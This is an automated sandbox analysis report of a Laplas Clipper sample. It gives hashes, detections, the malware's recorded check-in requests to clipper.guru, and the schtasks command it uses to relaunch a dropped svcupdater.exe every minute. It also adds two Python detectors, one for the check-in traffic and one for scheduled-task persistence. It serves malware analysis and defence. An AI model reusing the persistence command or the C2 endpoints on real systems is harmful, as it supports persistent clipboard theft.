Windows Analysis Report
IVO2cpEukR.exe

Overview

General Information

Sample Name: IVO2cpEukR.exe
Analysis ID: 736208
MD5: 6738634d9b3bfcf7ebca8be48c091b3e
SHA1: f08091a4b3f5c167bcdfa565584bed8ed2a69f0c
SHA256: 8c77759eff69330a5c9697d05e2a0f99c6edff904bdd52a048df0461d0459b27
Tags: exe LaplasClipper

Detection

Laplas Clipper, MicroClip
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MicroClip
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Laplas Clipper
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

AV Detection

Source: IVO2cpEukR.exe ReversingLabs: Detection: 14%
Source: http://clipper.guru/bot/online?guid=computer Avira URL Cloud: Label: phishing
Source: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe ReversingLabs: Detection: 14%
Source: Joe Sandbox View IP Address: 45.159.189.115
Source: svcupdater.exe, 00000004.00000002.522718471.000000C000186000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: svcupdater.exe, 00000004.00000002.522749478.000000C000192000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://clipper.guru/bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
Source: unknown DNS traffic detected: queries for: clipper.guru
Source: global traffic HTTP traffic detected (the following two requests were each observed three times during the run):
GET /bot/online?guid=computer\user&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
GET /bot/regex?key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File read: C:\Users\user\Desktop\IVO2cpEukR.exe
Source: IVO2cpEukR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\IVO2cpEukR.exe C:\Users\user\Desktop\IVO2cpEukR.exe
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG
Source: classification engine Classification label: mal84.troj.spyw.winEXE@7/3@3/1
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: IVO2cpEukR.exe Static file information: File size 5021696 > 1048576
Source: IVO2cpEukR.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: IVO2cpEukR.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x269800
Source: IVO2cpEukR.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x208e00
Source: IVO2cpEukR.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IVO2cpEukR.exe Static PE information: section name: .symtab
Source: svcupdater.exe.0.dr Static PE information: section name: .symtab
Source: C:\Users\user\Desktop\IVO2cpEukR.exe File created: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe (dropped file)
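Detection logic for the check-in traffic recorded above, as an added example that is not part of the sandbox report. It matches on the URL shape (GET /bot/online?guid=<host>\<user>&key=<64 hex> and GET /bot/regex?key=<64 hex>) rather than on clipper.guru, so it still fires if the operator moves to a new host; Go-http-client/1.1 is Go's default net/http User-Agent, which fits the .symtab section noted in the static PE information. The tab-separated log format and every line in SAMPLE_LOG are constructed for the example.

```python
"""Flag Laplas Clipper style check-ins in HTTP/proxy logs.

Added example for this report, not part of the sandbox output.  The request
shape comes from the traffic recorded above:
    GET /bot/online?guid=<host>\\<user>&key=<64 hex chars>
    GET /bot/regex?key=<64 hex chars>
with User-Agent Go-http-client/1.1 (Go's default net/http client string).
The match is on URL shape, not on clipper.guru, so it still fires when the
operator moves to a new host.  The log format used here (tab-separated
timestamp, client, method, url, user-agent) and every line in SAMPLE_LOG are
constructed for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

HEX64 = re.compile(r"^[0-9a-fA-F]{64}$")
BOT_PATHS = {"/bot/online", "/bot/regex"}
GO_UA_PREFIX = "Go-http-client/"


def classify_request(method, url, user_agent):
    """Return a reason string if the request looks like a clipper check-in, else None."""
    if method.upper() != "GET":
        return None
    parts = urlsplit(url)
    if parts.path not in BOT_PATHS:
        return None
    params = parse_qs(parts.query)
    key = params.get("key", [""])[0]
    if not HEX64.match(key):          # both endpoints carry the 64-hex bot key
        return None
    reasons = [f"{parts.path} with 64-hex key"]
    if parts.path == "/bot/online":
        guid = params.get("guid", [""])[0]
        if "\\" in guid:               # host\user pair as in the sample (sent as %5C on the wire)
            reasons.append("guid carries host\\user")
    if user_agent.startswith(GO_UA_PREFIX):
        reasons.append("Go default User-Agent")
    return "; ".join(reasons)


def scan_log(text):
    """Return a list of (timestamp, client, host, reason) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, ua = line.split("\t")
        reason = classify_request(method, url, ua)
        if reason:
            hits.append((ts, client, urlsplit(url).hostname, reason))
    return hits


SAMPLE_KEY = "0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef"  # key from the report
OTHER_KEY = "a" * 64                                                             # constructed
SAMPLE_LOG = "\n".join("\t".join(f) for f in [                                   # constructed log lines
    ("2022-11-06T10:01:02Z", "10.0.0.12", "GET",
     "http://clipper.guru/bot/online?guid=computer%5Cuser&key=" + SAMPLE_KEY, "Go-http-client/1.1"),
    ("2022-11-06T10:01:03Z", "10.0.0.12", "GET",
     "http://clipper.guru/bot/regex?key=" + SAMPLE_KEY, "Go-http-client/1.1"),
    # same endpoint shape on a different host and UA: still flagged, with fewer reasons
    ("2022-11-06T10:02:11Z", "10.0.0.20", "GET",
     "http://203.0.113.5/bot/regex?key=" + OTHER_KEY, "Mozilla/5.0"),
    # benign look-alikes: wrong path, short key, wrong method
    ("2022-11-06T10:02:30Z", "10.0.0.21", "GET",
     "http://intranet.example/api/online?guid=pc1&key=" + OTHER_KEY, "Go-http-client/1.1"),
    ("2022-11-06T10:02:45Z", "10.0.0.22", "GET",
     "http://example.com/bot/online?guid=x&key=deadbeef", "curl/7.81.0"),
    ("2022-11-06T10:03:00Z", "10.0.0.23", "POST",
     "http://example.com/bot/regex?key=" + OTHER_KEY, "Go-http-client/1.1"),
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit, sep="  ")
```

The third sample line is the useful one: a different host and a browser User-Agent still score on the endpoint shape alone, so the rule degrades gracefully when the domain or client changes, while the three benign look-alikes are rejected.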

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipXroBUdMG /tr \"C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\IVO2cpEukR.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (observed 4 times)
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: svcupdater.exe, 00000004.00000002.522992248.0000023E77048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: IVO2cpEukR.exe, 00000000.00000002.258406632.0000028D55C4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
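A hunt for scheduled tasks shaped like the persistence registered above, as an added example that is not part of the sandbox report. The schtasks command (/sc once /ri 1 /du 9999:59, action under %APPDATA%\<random>\svcupdater.exe) relaunches the dropped clipper every minute for roughly 416 days, so killing svcupdater.exe is not enough; the task has to be deleted. In Task Scheduler XML that command becomes a TimeTrigger with a one-minute Repetition Interval and a very long Duration. SAMPLE_TASK_XML is a constructed approximation of what schtasks.exe writes for it (exact fields vary by Windows build), BENIGN_TASK_XML is a constructed vendor-style task for contrast, and the path list in USER_WRITABLE and the task-name heuristic are the example's own assumptions.

```python
r"""Hunt scheduled tasks shaped like the persistence registered above.

Added example for this report, not part of the sandbox output.  The task the
sample creates (schtasks /sc once /ri 1 /du 9999:59, action under
%APPDATA%\<random>\svcupdater.exe) shows up in Task Scheduler XML as a
TimeTrigger whose Repetition has a one-minute Interval and a very long
Duration.  SAMPLE_TASK_XML is a constructed approximation of what
schtasks.exe writes for that command (exact fields vary by Windows build);
BENIGN_TASK_XML is a constructed vendor-style task for contrast.
On a live host, feed in the files under C:\Windows\System32\Tasks (they are
UTF-16; pass the raw bytes to ET.fromstring rather than decoding first) or
the output of `schtasks /query /tn <name> /xml`.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Locations a standard user can write to (assumed list); a task action living here is itself a signal.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|ProgramData|Users\\Public)\\", re.I)
# ISO 8601 durations as Task Scheduler writes them: PT1M, P1D, P416DT15H59M, ...
ISO_DUR = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """PT1M -> 60; P416DT15H59M -> 35999940; None if empty or unparsable."""
    m = ISO_DUR.match(text or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def assess_task(xml_text):
    """Score one task definition; returns (score, reasons). Higher is more suspicious."""
    root = ET.fromstring(xml_text)
    reasons = []
    cmd = root.findtext(".//t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    if USER_WRITABLE.search(cmd):
        reasons.append(f"action runs from user-writable path: {cmd}")
    for trig in root.findall(".//t:Triggers/t:TimeTrigger", NS):
        interval = iso_duration_seconds(trig.findtext("t:Repetition/t:Interval", default="", namespaces=NS))
        duration = iso_duration_seconds(trig.findtext("t:Repetition/t:Duration", default="", namespaces=NS))
        if interval is not None and interval <= 300:
            reasons.append(f"repeats every {interval}s")                  # /ri 1 -> PT1M
        if duration is not None and duration >= 86400:
            reasons.append(f"repetition window {duration // 86400} days")  # /du 9999:59
    uri = root.findtext(".//t:RegistrationInfo/t:URI", default="", namespaces=NS)
    if re.fullmatch(r"\\[A-Za-z0-9]{8,12}", uri):                         # heuristic, weak on its own
        reasons.append(f"random-looking task name at root: {uri}")
    return len(reasons), reasons


def triage(tasks, threshold=2):
    """Return [(uri, score, reasons)] for task XML blobs scoring at or above threshold."""
    out = []
    for xml_text in tasks:
        score, reasons = assess_task(xml_text)
        if score >= threshold:
            uri = ET.fromstring(xml_text).findtext(".//t:RegistrationInfo/t:URI", default="?", namespaces=NS)
            out.append((uri, score, reasons))
    return out


# Constructed approximation of the task the sample registers.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ipXroBUdMG</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <Duration>P416DT15H59M</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2022-11-06T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\ipXroBUdMG\svcupdater.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign task: daily vendor updater under Program Files.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Vendor\Updater</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2022-11-06T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for uri, score, reasons in triage([SAMPLE_TASK_XML, BENIGN_TASK_XML]):
        print(uri, score, *reasons, sep="\n  ")
```

The repetition window is the discriminating field: legitimate tasks that repeat every minute normally do so for an hour or a day, not for hundreds of days, and legitimate software rarely runs its action from a user-writable directory. The random-name check is kept deliberately cheap because on its own it would flag harmless tasks.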

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IVO2cpEukR.exe PID: 4544, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: svcupdater.exe PID: 6084, type: MEMORYSTR